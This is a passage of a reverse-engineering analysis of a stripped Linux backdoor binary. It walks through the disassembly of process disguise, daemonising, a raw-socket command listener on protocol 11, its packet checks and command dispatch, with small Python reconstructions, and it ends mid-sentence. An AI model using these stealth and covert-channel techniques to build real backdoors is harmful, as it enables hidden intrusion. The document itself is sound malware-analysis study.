Analysis
This analysis was written as a work in progress. It is not written as a review;
it was written line-by-line during the disassembly process and, as such, shows
all ideas and methods used to draw the various conclusions about the binary.
People will find this useful if they:
* Have a firm grasp on x86 assembly.
* Are interested in investigating Linux binary files.
* Have lots of time :)
It should be noted that this document was constructed over many nights and early mornings, and as such some things may make no sense. The original form of this analysis is a text file. This version is much shorter due to the easier formatting. Thanks go to stimpz for converting my vi analysis file to this html file at short notice.
A. Binary Analysis
i) Binary type:
exploit-dev:/reverse# file the-binary
the-binary: ELF 32-bit LSB executable, Intel 80386, version 1,
statically linked, stripped
ii) Execution starting point:
Since the binary could well be quite smart (and it's stripped - ugh), we'll
get ourselves a dump of the important parts of the ELF header:
exploit-dev:/reverse# hexdump the-binary | head -n 2
0000000 457f 464c 0101 0001 0000 0000 0000 0000
0000010 0002 0003 0001 0000 8090 0804 0034 0000
The important part of this data is the bytes 0x18 to 0x1B, because this is
"e_entry", the entry point for the code. Note that hexdump prints 16-bit
words, and the byte order is little endian (also obtained from the header).
[see Elf32_Ehdr - elf.h]
e_entry = 0x08048090
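The same extraction can be scripted. The following is a minimal Python sketch, not something used during the original analysis: it rebuilds the 32 header bytes from the hexdump output above (undoing the 16-bit word grouping) and unpacks the Elf32_Ehdr fields that follow e_ident. The helper name words_to_bytes is made up for illustration.

```python
import struct

# The two hexdump lines shown above, exactly as printed (16-bit words).
HEXDUMP_WORDS = (
    "457f 464c 0101 0001 0000 0000 0000 0000 "
    "0002 0003 0001 0000 8090 0804 0034 0000"
).split()


def words_to_bytes(words):
    """Undo hexdump's 16-bit little-endian word grouping."""
    return b"".join(struct.pack("<H", int(word, 16)) for word in words)


header = words_to_bytes(HEXDUMP_WORDS)

# Elf32_Ehdr after the 16-byte e_ident: e_type and e_machine (2 bytes each),
# then e_version, e_entry and e_phoff (4 bytes each), all little endian.
e_type, e_machine, e_version, e_entry, e_phoff = struct.unpack_from(
    "<HHIII", header, 16
)

print(hex(e_entry))
```

The e_type of 2 (executable) and e_machine of 3 (Intel 80386) recovered alongside e_entry agree with the output of file above.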
iii) The code is disassembled, starting from 0x08048090. What is seen is quite
standard C setup code. After following several calls and finding nothing
tricky, we reach a set of instructions that appear to correspond to
further coded execution points.
These are:
0x80480e1: call 0x8048080
0x80480e6: call 0x8048134
0x80480eb: pushl %eax
0x80480ec: call 0x8055fbc
Analysis of the first call at 0x80480e1 shows it to resemble the
initialisation section that calls any constructors and returns.
Dumping the .ctors (constructors) section shows:
(gdb) x/12b 0x80792ac
0x80792ac: 0xff 0xff 0xff 0xff 0x00 0x00 0x00 0x00
0x80792b4: 0xff 0xff 0xff 0xff
This indicates (and analysis of the call at 0x80480e1 shows) that there
are no constructors! Yet again, a whole lot of code analysis, with no
secret special undercover bits found.
While looking at this section, it should be noted this is standard startup
code, with the above three calls corresponding to init, main, and exit
codes which are present in any standard elf32 gcc-compiled binary.
(Running strings on the binary reveals that GNU GCC 2.7.2 appears to be
the compiler used!)
iv) "main" Analysis - finally something of interest...
For the purposes of this code we'll term the memory reference at 0x8048134
as "main" since this is probably what it would correspond to for the
blackhat.
One thing can be noted straight off, this is NOT one of those short
generic kiddie backdoors, it is long and complex and is a real *&^@#!
because it's stripped. i.e. This is going to be an extremely long process
to analyse it in any depth. Any shallow investigation work on it will
only lead to the missing of the details. With that said however, the
setup code here contains little new or specific to this binary. As such,
the smaller details here will only be mentioned with assembly ranges
rather than a full disassembly with line-by-line commentary. If one
wishes to follow this section, they are advised to be running a
disassembler on the binary in another console. ;)
Getting right into the code, we saw earlier the call to 0x8048134. This
marks the start of the "main" code:
0x8048134 - 0x804817a:
generic function/variable setup.
0x804817b: call 0x805720c
Inspection:
0x805720f: movl $0x31,%eax
0x8057214: int $0x80
[Quick howto for asm int $0x80 (calls 0x31 == 49)]
exploit-dev:/reverse# grep -i "49" /usr/include/asm/unistd.h
#define __NR_geteuid 49
Simply looks like generic geteuid() code
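Since this lookup is repeated for every int $0x80 met in this analysis, it can help to keep a small table at hand. This is a sketch in Python holding only the i386 syscall numbers that turn up in this document (values as defined in asm/unistd.h for 32-bit x86); the table and function names are made up for illustration.

```python
# i386 syscall numbers: the value loaded into %eax before int $0x80.
I386_SYSCALLS = {
    0x02: "fork",
    0x05: "open",
    0x06: "close",
    0x0C: "chdir",
    0x0D: "time",
    0x1B: "alarm",
    0x25: "kill",
    0x31: "geteuid",
    0x42: "setsid",
    0x43: "sigaction",
    0x48: "sigsuspend",
    0x52: "select",
    0x66: "socketcall",
    0x7E: "sigprocmask",
}


def syscall_name(eax):
    """Name the syscall for a given %eax value, if it is in the table."""
    return I386_SYSCALLS.get(eax, "unknown (check unistd.h)")


print(syscall_name(0x31))
```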
0x8048180 - 0x804818a:
If we do not have root privs, we call 0x8055fbc. A quick look at the
code of this function makes it look like exit() code, but this has not
been checked in depth!
0x804818c - 0x804819e:
I have never seen any compiler generate code like this section. It
has the effect of determining string length (it may possibly be some
form of custom inline assembly?) [Later realised the binary has been
compiled with optimisations, and this is more than likely an optimised
strlen().]
0x804819f - 0x80481a7:
Unsure of function call. From the stack setup it looks to be
function(pointer, 0, pointer). Possibly a memset() but needs to be
verified with execution.
0x80481a8 - 0x80481cb:
A direct memory copy of 10 bytes from 0x80675d8.
(gdb) x/1s 0x80675d8
0x80675d8: "[mingetty]"
It is assumed this is an argv[0] replacement to hide the binary under
programs such as ps. If so, then the previous section is more than
likely a memset() as assumed.
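The three steps suspected so far (strlen, memset, 10 byte copy) can be modelled on a plain byte buffer. This is only a sketch of the assumed behaviour in Python: the starting name "./the-binary" is a hypothetical invocation, and the function name is made up.

```python
def overwrite_argv0(argv0: bytearray, new_name: bytes) -> bytearray:
    """Model of the suspected argv[0] replacement, done in place."""
    # Optimised strlen(): length up to the first NUL.
    length = argv0.index(0)
    # Suspected memset(argv0, 0, length): wipe the old name.
    argv0[:length] = bytes(length)
    # Direct copy of the 10 bytes found at 0x80675d8.
    # Assumes the new name is no longer than the old one.
    argv0[:len(new_name)] = new_name
    return argv0


original = bytearray(b"./the-binary\x00")   # hypothetical original argv[0]
print(overwrite_argv0(original, b"[mingetty]"))
```

Wiping the old name first matters when the original name is longer than the replacement, as otherwise the tail of the old name would still show up in ps.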
0x80481cc - 0x80481d4:
Call which eventually leads to:
0x80574ef: movl $0x43,%eax
0x80574f7: int $0x80
sigaction() call. Setup seems to be for signal(). The pushl's at
0x80481cc and 0x80481ce would correspond to signal(SIGCHLD, SIG_IGN).
This means the parent process does not have to wait for the child
process to finish.
0x80481d5 - 0x80481d9:
Call which eventually leads to:
0x80571eb: movl $0x2,%eax
0x80571f0: int $0x80
fork() call. This would explain the previous sigaction.
0x80481da - 0x80481e7:
If we are the parent we call 0x8055fbc which was earlier deemed to most
likely be exit() code. Since this would be a common thing to do to
daemonise code, it will be accepted that 0x8055fbc is indeed exit()
code for the rest of this analysis.
0x80481e8 - 0x80481ec:
Call which eventually leads to:
0x805733f: movl $0x42,%eax
0x8057344: int $0x80
setsid() call.
0x80481ed - 0x8048208:
Identical signal() / fork() code. This will completely dissociate
this process from any other.
0x804820c - 0x8048215:
Call which eventually leads to:
0x8057138: movl $0xc,%eax
0x8057140: int $0x80
chdir() call. The value pushed onto the stack just prior to the call:
(gdb) x/1s 0x80675e3
0x80675e3: "/"
This is an obvious attempt to change the current directory to /.
0x8048216 - 0x804822a:
Call which eventually leads to:
0x8057164: movl $0x6,%eax
0x805716c: int $0x80
close() call. Three of these are called with stack setups which
correspond to: close(0), close(1), and close(2). Effectively closing
all 'normal' inherited file descriptors.
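Put together, the calls from 0x80481cc to 0x804822a read like a textbook daemonise routine. The following Python sketch shows the same sequence using the os and signal modules. It is a reconstruction from the syscalls identified above, not recovered source; the exit status of 0 is an assumption, and the function is deliberately only defined here, not called.

```python
import os
import signal


def daemonise():
    """Rough equivalent of the startup sequence at 0x80481cc - 0x804822a."""
    signal.signal(signal.SIGCHLD, signal.SIG_IGN)  # no need to wait on children
    if os.fork() != 0:
        os._exit(0)          # parent exits (status 0 is an assumption)
    os.setsid()              # new session, detached from the terminal
    signal.signal(signal.SIGCHLD, signal.SIG_IGN)
    if os.fork() != 0:
        os._exit(0)          # the session leader exits as well
    os.chdir("/")            # string at 0x80675e3
    for fd in (0, 1, 2):     # stdin, stdout, stderr
        os.close(fd)
```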
0x8048249 - 0x804824f:
Call which eventually leads to:
0x8057448: movl $0xd,%eax
0x8057450: int $0x80
time() call. Stack shows it is a time(0) call.
0x8048253 - 0x8048258:
Looks to be a function call using the return of time(0). The function
seems very complex with regards to processing, but does not seem to
have any significant purpose...the use of time(0) could suggest it is
an srandom() call but this is only a guess and it could be something
written by the author themselves.
0x804825c - 0x8048266:
Call which eventually leads to:
0x8056d0d: movl $0x1,%edx
0x8056d15: movl $0x66,%eax
0x8056d1a: movl %edx,%ebx
0x8056d1c: int $0x80
socketcall. Checking %ebx reveals it is actually a call for socket().
A quick look at the stack setup shows pushes of 0xb, 0x3, 0x2,
corresponding to a socket(2, 3, 11). A quick look in socket.h reveals
it is: socket(AF_INET, SOCK_RAW, 11). My personal /etc/protocols
doesn't have a type 11, nor could I find any reference to what actually
uses this protocol. [Side note: curiosityLevel++]
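Decoding a socketcall takes two steps: the sub-call number in %ebx picks the function, and the pushed values (last argument first) give its parameters. A small Python sketch of that decoding follows. The sub-call numbers are those from linux/net.h; the constant tables only cover what is needed here, and the function name is made up.

```python
# Sub-call numbers passed in %ebx to socketcall (linux/net.h).
SOCKETCALL = {
    1: "socket", 2: "bind", 3: "connect", 4: "listen", 5: "accept",
    6: "getsockname", 7: "getpeername", 8: "socketpair", 9: "send",
    10: "recv", 11: "sendto", 12: "recvfrom", 13: "shutdown",
    14: "setsockopt", 15: "getsockopt", 16: "sendmsg", 17: "recvmsg",
}
ADDRESS_FAMILIES = {2: "AF_INET"}
SOCKET_TYPES = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}


def describe_socket_call(ebx, pushed):
    """pushed: values in the order they were pushed (last argument first)."""
    name = SOCKETCALL[ebx]
    args = list(reversed(pushed))
    if name == "socket":
        domain, sock_type, protocol = args
        return "socket(%s, %s, %d)" % (
            ADDRESS_FAMILIES.get(domain, domain),
            SOCKET_TYPES.get(sock_type, sock_type),
            protocol,
        )
    return "%s(%s)" % (name, ", ".join(hex(a) for a in args))


print(describe_socket_call(1, [0xB, 0x3, 0x2]))
```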
0x804826d - 0x8048296:
Call which eventually leads to:
0x80574ef: movl $0x43,%eax
0x80574f7: int $0x80
sigaction again. More specifically, the author seems to call signal()
yet again, 4 times. Each time the first value pushed (second function
parameter) is a 0x1 which corresponds to a SIG_IGN. SIGHUP, SIGTERM,
and SIGCHLD correspond to the other values, with SIGCHLD ignored twice
for some reason...
0x80482b0 - 0x80482c9:
Call which eventually leads to:
0x8056b63: movl $0xa,%edx
0x8056b6b: movl $0x66,%eax
0x8056b70: movl %edx,%ebx
0x8056b72: int $0x80
socketcall. Once again, checking %ebx shows the call to be SYS_RECV.
Looking at the setup to the call:
0x80482b0: pushl $0x0
0x80482b2: pushl $0x800
0x80482b7: leal 0xfffff800(%ebp),%eax
0x80482bd: pushl %eax
0x80482be: movl 0xffffbb38(%ebp),%ecx
0x80482c4: pushl %ecx
0x80482c5: call 0x8056b44
This corresponds to: recv(X, Y, 0x800, 0). It is assumed X is the
previously created socket [Assumption later verified as correct], and Y
is some buffer. This call will be a blocking call.
0x80482d5:
We continue down to the first of a series of checks:
0x80482cf: movl 0xffffbb30(%ebp),%edx
0x80482d5: cmpb $0xb,0x9(%edx)
Checking of what 0xffffbb30(%ebp) really is (from earlier in the code):
0x804814d: leal 0xfffff800(%ebp),%edx
0x8048153: movl %edx,0xffffbb30(%ebp)
We can now see that (%edx) corresponds directly to the recv() buffer.
Back to the compare statement, we can see that we compare the 10th byte
of the packet to the value of 0xb. We know that the socket is a raw
socket so it will fill in the buffer beginning with an IP header. A
check in ip.h of an ip header shows the 10th byte should correspond to
none other than the protocol. We end up comparing this to none other
than 11. Considering the socket() call was for protocol 11, this is
probably an unnecessary check...
0x80482e5:
Next check:
0x80482df: movl 0xffffbb2c(%ebp),%ecx
0x80482e5: cmpb $0x2,(%ecx)
Once again, checking what 0xffffbb2c(%ebp) really is:
0x8048159: leal 0xfffff814(%ebp),%ecx
0x804815f: movl %ecx,0xffffbb2c(%ebp)
So it appears (%ecx) will point to 0x14 bytes into the recv() buffer.
Nice and tidy that it points to just after a normal IP header
(20bytes)! We end up comparing the first byte of the after-IP-header
data and checking that it is a 0x2.
0x80482ee:
Next Check:
0x80482ee: cmpl $0xc8,%esi
0x80482f4: jle 0x8048eb8
We have to go back to see what %esi is:
0x80482c5: call 0x8056b44
0x80482ca: movl %eax,%esi
The "call 0x8056b44" was earlier seen to be a recv(). The next line
will put the return of this function (the amount of data read by recv())
into %esi. So when we do the cmpl statement, we're actually checking
that the amount of data read is greater than 0xc8 bytes (the jle sends
0xc8 bytes or fewer to the failure path).
For sake of loose ends, if any of these checks fail, the execution jumps
to 0x8048eb8 which is where we'll end up later anyway. These checks are
a typical example of "if (check && check && check) { do things }".
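The three checks can be collapsed into a single predicate. This is a Python sketch of the logic as read from the disassembly, with made-up names. One liberty is taken: the length test is done first so that short test inputs cannot index out of range, whereas the binary tests the protocol and first data byte first (its buffer has a fixed size, so the order does not matter there).

```python
IP_HEADER_LEN = 20   # the binary assumes a 20 byte IP header
PROTOCOL = 0x0B      # compared against byte 9 of the IP header
FIRST_DATA_BYTE = 0x02
MIN_LEN = 0xC8


def passes_checks(packet: bytes) -> bool:
    """True if a received packet would reach the code at 0x80482fa."""
    return (
        len(packet) > MIN_LEN                          # cmpl $0xc8,%esi ; jle
        and packet[9] == PROTOCOL                      # cmpb $0xb,0x9(%edx)
        and packet[IP_HEADER_LEN] == FIRST_DATA_BYTE   # cmpb $0x2,(%ecx)
    )


candidate = bytearray(201)
candidate[9] = PROTOCOL
candidate[IP_HEADER_LEN] = FIRST_DATA_BYTE
print(passes_checks(bytes(candidate)))
```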
Whether or not the checks all turn out true or false, we eventually end
up at 0x8048eb8 which has:
0x8048eb8: pushl $0x2710
0x8048ebd: call 0x80555b0
0x8048ec2: addl $0x4,%esp
0x8048ec5: jmp 0x80482b0
The call at 0x80555b0 contains another call which eventually leads us to:
0x80574a4: movl $0x52,%eax
0x80574ac: int $0x80
A select() call with the following parameters:
0x80555e7: pushl %eax
0x80555e8: pushl $0x0
0x80555ea: pushl $0x0
0x80555ec: pushl $0x0
0x80555ee: pushl $0x1
0x80555f0: call 0x80574a0
This seemed rather odd until google showed the way. Pulled from the
"Unix Programming Frequently Asked Questions":
1.3 How can I sleep for less than a second?
[...]
* You can use select() or poll(), specifying no file descriptors to
test; a common technique is to write a usleep() function based on
either of these...
Looks like this function was simply a sleep or usleep call...(ugh #3 @
wasted time)
And as can be seen:
0x8048ec5: jmp 0x80482b0
upon completion of the sleep, we jump back up to the recv() call in a
continuous loop.
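The select() trick from the FAQ is easy to try out. In this Python sketch, select.select() is given no descriptors at all, only a timeout, so all it can do is sleep. Treating the pushed 0x2710 as a microsecond count (i.e. assuming the function really is a usleep()) gives a 10 ms pause between recv() attempts.

```python
import select
import time


def usleep(microseconds):
    """Sleep using select() with no file descriptors, only a timeout."""
    select.select([], [], [], microseconds / 1_000_000)


start = time.monotonic()
usleep(0x2710)   # the value pushed at 0x8048eb8: 10000, assumed microseconds
elapsed = time.monotonic() - start
print("slept for about %.1f ms" % (elapsed * 1000))
```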
v) Core Functionality:
Section iv quickly looked at the coding that had gone into the
initialisation of the binary. This section will now analyse the loop
which, at a glance, looks to have quite a lot of functionality (hopefully
containing something to make trudging through everything else
worthwhile!). This section will be looked at in a LOT more detail, with
a line-by-line commentary where needed if particular areas are complex.
0x80482fa:
We return back to 0x80482fa. This point should only be reached when
the following conditions are met on a received packet:
* IP Protocol is 11
* 1st byte (assuming 20 byte IP header) of IP packet data must be a
binary 0x2.
* Packet length (including IP header) must be greater than 0xc8
bytes (200 bytes).
Continuing analysis:
0x80482fa: movl 0xffffbb20(%ebp),%edx
0x8048300: pushl %edx
0x8048301: movl 0xffffbb28(%ebp),%ecx
0x8048307: pushl %ecx
0x8048308: leal 0xffffffea(%esi),%eax
0x804830b: pushl %eax
0x804830c: call 0x804a1e8
The code at 0x804a1e8 does not appear to do anything of functionality.
Instead, it looks to do a form of memory manipulation. The following
is a quick analysis of this function and how one can draw an educated
guess as to its memory manipulation purpose:
It contains a single call to 0x804f808 which itself calls 0x804f820.
Still nothing system-ish called even from this function directly,
however it sparks up a whole tree of calls:
0x8061f34 - does memory manipulations
0x8052e80 - seems to also do memory manipulations
- I recognise some string-based optimised code such as
strlen(). Can't be sure that's what it is, but it is
identical to the code earlier that i believe is
a compiler optimised strlen().
- calls 0x8061b6c
- calls 0x8066154
- contains function calls to munmap()
0x804f888 - calls 0x8052de8
- calls 0x805602c
- follows some execution path i cannot follow...
0x8061910 - unsure
This one call at 0x804a1e8 seems to be more about memory manipulation,
possibly string-based than anything else. It is probably not worth
sifting through - at least for the moment. It would probably be
better left for run-time debugging.
A quick look at the parameters passed to this function reveals the
passing of 0xffffbb20(%ebp), 0xffffbb28(%ebp), and 0xffffffea(%esi).
Matching these up with appropriate data:
0xffffbb20(%ebp):
The last time 0xffffbb20(%ebp) was modified:
0x8048297: leal 0xfffff000(%ebp),%ecx
0x804829d: movl %ecx,0xffffbb20(%ebp)
There are no other references earlier in the code to
0xfffff000(%ebp). This address does however fall within the
initial stack allocation at the very beginning of the program:
0x8048137: subl $0x44f0,%esp
There seems to be at most 0x800 bytes until the next piece of
data which is referenced at 0x804814d. The next piece of data
was a block of memory passed to recv() as the buffer, also with a
size of 0x800. It is doubtful that this is a coincidence, and as
such, 0xffffbb20(%ebp) is believed to be a buffer of 0x800 bytes
[Upon completion of analysis, no other data appears to be
in this range, and the assumption of a size of 0x800 bytes is
believed correct].
0xffffbb28(%ebp):
The last time 0xffffbb28(%ebp) was modified occurred at startup:
0x8048165: leal 0xfffff816(%ebp),%edx
0x804816b: movl %edx,0xffffbb28(%ebp)
As we saw earlier in the analysis of the packet checks,
0xfffff814(%ebp) points to directly after the IP header.
0xffffbb28(%ebp) holds the address of 0xfffff816(%ebp) which, as
can be seen, is the 3rd byte of the IP packet data.
0xffffffea(%esi):
Remember that we are dealing with a leal statement this time,
%esi at this point in time will still be equal to the amount of
data returned by recv. 0xffffffea(%esi) will be a direct value
of the amount of data received minus 0x16.
So the function call looks like this:
function(AmountOfDataReceived-22, IP_Packet_Data, SomeBuffer)
NOTE: 0x804a1e8 will be analysed further in the function analysis
section under the title of "Data_Manipulation_Function_A".
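The large 0xffff.... displacements are just negative offsets printed as unsigned 32-bit values. A short Python sketch (the helper name is made up) makes the arithmetic behind the three parameters explicit:

```python
def signed32(value):
    """Interpret a 32-bit displacement as printed by the disassembler."""
    return value - (1 << 32) if value & 0x80000000 else value


RECV_BUFFER = signed32(0xFFFFF800)   # recv() buffer, relative to %ebp

print(signed32(0xFFFFFFEA))                 # length adjustment applied to %esi
print(signed32(0xFFFFF814) - RECV_BUFFER)   # offset of the IP packet data
print(signed32(0xFFFFF816) - RECV_BUFFER)   # offset passed as second parameter
print(RECV_BUFFER - signed32(0xFFFFF000))   # gap between the two buffers
```

The printed values are -22, 20, 22 and 2048 (0x800), so the length passed is exactly the number of bytes received beyond offset 22 of the packet.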
0x8048314:
At this stage, it is assumed that the previous function named
"Data_Manipulation_Function_A" has quite possibly processed the
IP packet data contents and since it does not appear to do anything
system-wise, it is assumed its purpose is some form of encryption
processing on the packet [Later verified to be true - see Function
Analysis section].
The first statement of this block is:
movzbl 0xfffff001(%ebp),%eax
A look back at Data_Manipulation_Function_A shows the passing of
0xfffff000(%ebp) as the "SomeBuffer" (see function call appearance in
previous section). %eax is loaded with the 2nd byte from this buffer.
0x804831b - 0x804832b:
At first glance, this section looks complex:
0x804831b: decl %eax
0x804831c: cmpl $0xb,%eax
0x804831f: ja 0x8048eb8
0x8048325: jmp *0x804832c(,%eax,4)
Experience allows this section to easily be identified as a typical
implementation of a C switch() statement. This switch will be based
upon the previously discussed 2nd byte from "SomeBuffer".
The cmpl and ja statements are typical of a bounded switch statement,
catching values for which no case exists. Because ja is an unsigned
comparison made after the decl, execution will be directed to the
familiar code of 0x8048eb8 if this selected byte is greater than 12,
or if it is 0 (0 - 1 wraps around to 0xffffffff). As seen earlier,
this jump simply results in a brief sleeping state, followed by a
jump back to the recv() function.
The jmp table would have to consist of 0xc entries (each of 4 bytes),
and is located at 0x804832c:
(gdb) x/48b 0x804832c
0x804832c: 0x5c 0x83 0x04 0x08 0xf0 0x83 0x04 0x08
0x8048334: 0x90 0x85 0x04 0x08 0x1c 0x87 0x04 0x08
0x804833c: 0xc8 0x87 0x04 0x08 0x94 0x88 0x04 0x08
0x8048344: 0xcc 0x8a 0x04 0x08 0x58 0x8b 0x04 0x08
0x804834c: 0x80 0x8b 0x04 0x08 0x34 0x8c 0x04 0x08
0x8048354: 0x08 0x8d 0x04 0x08 0xe4 0x8d 0x04 0x08
So in a more readable format:
SomeBuffer[1] jump address
1 0x0804835c
2 0x080483f0
3 0x08048590
4 0x0804871c
5 0x080487c8
6 0x08048894
7 0x08048acc
8 0x08048b58
9 0x08048b80
A 0x08048c34
B 0x08048d08
C 0x08048de4
* NOTE the decl %eax was taken into consideration hence why our
list starts at 1 instead of 0.
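The table decoding and the dispatch logic can be checked mechanically. This Python sketch unpacks the 48 bytes from the gdb dump as twelve little-endian addresses and mirrors the decl / cmpl / ja / jmp sequence; the function and constant names are made up.

```python
import struct

# The 48 bytes dumped from 0x804832c, one gdb row per line.
JUMP_TABLE_BYTES = bytes.fromhex(
    "5c830408 f0830408"
    "90850408 1c870408"
    "c8870408 94880408"
    "cc8a0408 588b0408"
    "808b0408 348c0408"
    "088d0408 e48d0408"
)
JUMP_TABLE = struct.unpack("<12I", JUMP_TABLE_BYTES)
DEFAULT = 0x8048EB8   # sleep, then back to recv()


def dispatch(selector):
    """Return the address executed for a given value of SomeBuffer[1]."""
    index = (selector - 1) & 0xFFFFFFFF   # decl %eax
    if index > 0xB:                       # cmpl $0xb,%eax ; ja (unsigned)
        return DEFAULT
    return JUMP_TABLE[index]              # jmp *0x804832c(,%eax,4)


for selector in range(0, 14):
    print(hex(selector), hex(dispatch(selector)))
```

Selectors 0 and 13 both print 0x8048eb8, since 0 wraps around under the unsigned comparison.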
Case code (believe it or not, this is where things get complex!):
0x0804835c:
This section appears to have three parts.
* Setup a buffer at 0xfffff800(%ebp)
* Do memory manipulation on this buffer
* Send special packets containing this manipulated data
The buffer setup starts off rather peculiarly. It uses a 0 from
memory to set 0xfffff800(%ebp) to 0. This was probably generated
from a strcpy(Buffer, "") call that has been optimised by the compiler.
It should be noted that 0xfffff800(%ebp) is the same buffer we used
for recv(). It actually contains our original packet so in effect
we are making modifications to the original packet.
Another 3 modifications are made (First of which overwrites the
'strange' modification - adds extra strangeness to it although it
could simply be a bug...).
buffer at 0xfffff800(%ebp) has the following modifications:
0xfffff800(%ebp) = 1 byte value from heap at 0x807e77c.
This heap position has not been modified in any
way at program startup. It is probably a
global variable that we will name "Global_A".
0xfffff801(%ebp) = 1
0xfffff802(%ebp) = 7
Another byte in the heap at 0x807e774 is now checked. If it is
non-zero, the following is done:
0xfffff803(%ebp) = 1
0xfffff804(%ebp) = byte value at 0x807e778
If it is zero:
0xfffff803(%ebp) = 0
The following code is then followed under all conditions:
0x80483a7: movl 0xffffbb20(%ebp),%edx
0x80483ad: pushl %edx
0x80483ae: leal 0xfffff800(%ebp),%eax
0x80483b4: pushl %eax
0x80483b5: pushl $0x190
0x80483ba: call 0x804a194
The call when analysed exhibits very similar functionality as
Data_Manipulation_Function_A, however it is not identical. This
function at 0x804a194 will be termed Data_Manipulation_Function_B
and looked at in detail in the Function Analysis section.
0xffffbb20(%ebp) seems familiar, and when looking over the previous
code, it is seen to still be 0xfffff000(%ebp). This is the 'buffer'
that was earlier passed to Data_Manipulation_Function_A.
0xfffff800(%ebp) is also familiar, being the buffer that contains
our original packet as received by recv(), with the modifications
made earlier in this case section.
Finally, the value 0x190 is hardcoded and is passed to
Data_Manipulation_Function_B, prompting reasoning that this function
is multi-purpose and not unique to this case section.
Next part of this section:
0x80483bf: call 0x8056058
0x80483c4: movl $0xc9,%ecx
0x80483c9: cltd
0x80483ca: idivl %ecx,%eax
Unknown what purpose this serves, possibly key generation of
some description, but this would be a wild guess. The call does
not appear to do anything system-wise. Whatever the result,
%eax appears to be the reason for these instructions since:
0x80483ce: leal 0x190(%ebx),%eax
0x80483d4: pushl %eax
This is the first parameter put on the stack for a new function we
will look at shortly. This parameter is effectively 0x190 + the
value in %ebx which was processed as part of the previous code.
[Note, this call at 0x8056058 has since been thought to be a random
number generator, the code just after this call would indicate it
would then be MOD 0xc9]
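If the call really is a random number generator, the value pushed is easy to bound. The Python sketch below assumes that the remainder of the division is what ends up in %ebx (the instruction moving it there is not shown above) and that the generator returns non-negative 31-bit values like random(); both are assumptions, and the function name is made up.

```python
import random


def padded_length(random_value):
    """0x190 plus the random value MOD 0xc9, as pushed at 0x80483d4."""
    return 0x190 + random_value % 0xC9


lengths = {padded_length(random.getrandbits(31)) for _ in range(10_000)}
print(min(lengths), max(lengths))
```

Under those assumptions the first parameter always falls between 400 and 600, which would give each outgoing packet a slightly different length.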
The next parameter is already becoming quite familiar:
0x80483d5: movl 0xffffbb20(%ebp),%edx
0x80483db: pushl %edx
0xffffbb20(%ebp) is already familiar, as the 'buffer' that was
passed to Data_Manipulation_Function_B.
The next parameter is new and has not yet been looked at:
0x80483dc: movl 0xffffbb1c(%ebp),%ecx
0x80483e2: pushl %ecx
0xffffbb1c(%ebp) falls directly before 0xffffbb20(%ebp), so it can
be assumed that 0xffffbb1c(%ebp) is some form of 4 byte variable.
This variable was set much earlier just prior to the recv() call:
0x80482a3: leal 0xffffee48(%ebp),%edx
0x80482a9: movl %edx,0xffffbb1c(%ebp)
Looking at the contents of the stack at 0xffffee48(%ebp), the
closest variable reference that can be found anywhere in the code
appears to be:
0x8048638: leal 0xffffee70(%ebp),%edx
This portion of code does appear to be a legitimate part of the
program and will be analysed later. During this stage of analysis,
the memory starting at 0xffffee48(%ebp) is suspected of being a
buffer of at least 40 bytes. This portion of memory will be termed
Buffer_A for the rest of this analysis.
With these variables on the stack:
0x80483e3: call 0x8048ecc
Attempting to piece the function into a C format:
function(Buffer_A, manipulated_buffer, 0x190 + X)
The function is normally reviewed prior to the parameters just to
ensure it is a vital part of the code. This function was indeed
quickly checked and has been determined to contain references to:
0x8056d0d: movl $0x1,%edx
0x8056d15: movl $0x66,%eax
0x8056d1a: movl %edx,%ebx
0x8056d1c: int $0x80
This corresponds to a socket() call and as such the function will be
reviewed later in the function analysis section. It has been termed
Network_Function_A.
Upon completion of this code, a jump is followed back to 0x8048eb8.
As you may recognise, this is just before the sleeping state which
is followed by the jump back to recv().
[This section is re-examined later when more information is known
about the various buffers and especially Network_Function_A. The
re-analysis is named Re-Examination_A.]
0x080483f0:
A lot of variable setup seems to occur in this section. Of note is
the setting of the 0x807e780-0x807e783 range from the 17th to 20th
bytes of the packet data from the recv() function. These bytes are
the destination IP for the packet (normally the IP of the
machine running the binary).
One of the first few calls executed looks like this:
0x804842d: pushl $0x0
0x804842f: call 0x8057444
0x8048434: addl $0x4,%esp
0x8048437: pushl %eax
0x8048438: call 0x80559a0
These two calls were analysed earlier when they were called from
0x8048249. At that point in time, the first call was deemed to be a
time(0), and the second was suspected (but by no means confirmed) to
be an srandom() call using the time(0) return as a parameter.
A new function call then appears:
0x8048440: call 0x8056058
This function seems to only have one purpose, that is to call
another:
0x805605b: call 0x8055e38
This one is not recognised either, and following it does not unleash
its secrets. It seems to read from 0x8078958, but it is unknown
just what is at this location at this time. Given the suspected
srandom(), it is quite possible this is some kind of random number
function!
This makes a lot of sense given the next piece of code:
0x8048445: movl $0xa,%ecx
0x804844a: cltd
0x804844b: idivl %ecx,%eax
This looks simply like MOD code. Note that idivl leaves the quotient
in %eax and the remainder in %edx, so it is %edx that will always hold
a value from 0 to 9.
The next section is quite complex. A full analysis will be needed.
We enter the section with our 'probable' random value from 0 to 9 in
%edx (it is copied into %edi by the first instruction below).
A long look at the code flow of the following shows it to be a loop.
It looks like %ebx takes a counter and pointer role, seeing the loop
through the values 0 through to 9 (would make sense considering the
value in %edi):
0x804844d: movl %edx,%edi
0x804844f: xorl %ebx,%ebx
0x8048451: xorl %esi,%esi
0x8048453: nop
0x8048454: cmpl %edi,%ebx
0x8048456: je 0x804852b
0x804845c: cmpl $0x2,0x807e784
0x8048463: jne 0x8048498
[...]
0x804852e: incl %ebx
0x804852f: cmpl $0x9,%ebx
0x8048532: jle 0x8048454
The core of the code (inside the loop) consists of conditional
sections with it all being encapsulated from the conditional at
0x8048454. A further conditional (and much more important) is
located at 0x804845c. It splits the rest of the loop contents into
two parts, and seems to be conditional on a value stored at
0x807e784. This value was set earlier in this very same case
section:
0x80483f0: movzbl 0xfffff002(%ebp),%edx
0x80483f7: movl %edx,0x807e784
And once again we see the familiar 0xfffff000(%ebp) range. For a
reminder, this is the data buffer passed to
Data_Manipulation_Function_A earlier. As we can see, the 3rd byte
is used for setting the contents of 0x807e784, which due to its
location can be assumed to be a global variable. Since it seems it
could be of importance, we'll name it "Global_B".
With the flow sorted out, lets now look at what purpose this section
could possibly play.
Firstly, we have a loop that relies on a variable that is never
modified within the loop. This ensures it will repeat 10 times.
To simplify what is going on, the first conditional will play a
role. It will trigger on all values 0 to 9 except the one that is
equal to our 'random 0 to 9' number. The reason behind leaving this
one out will be seen later.
As for what all this code does, it seems to want to set values in
the memory pointed to by 0xffffbb1c(%ebp). This just happens to be
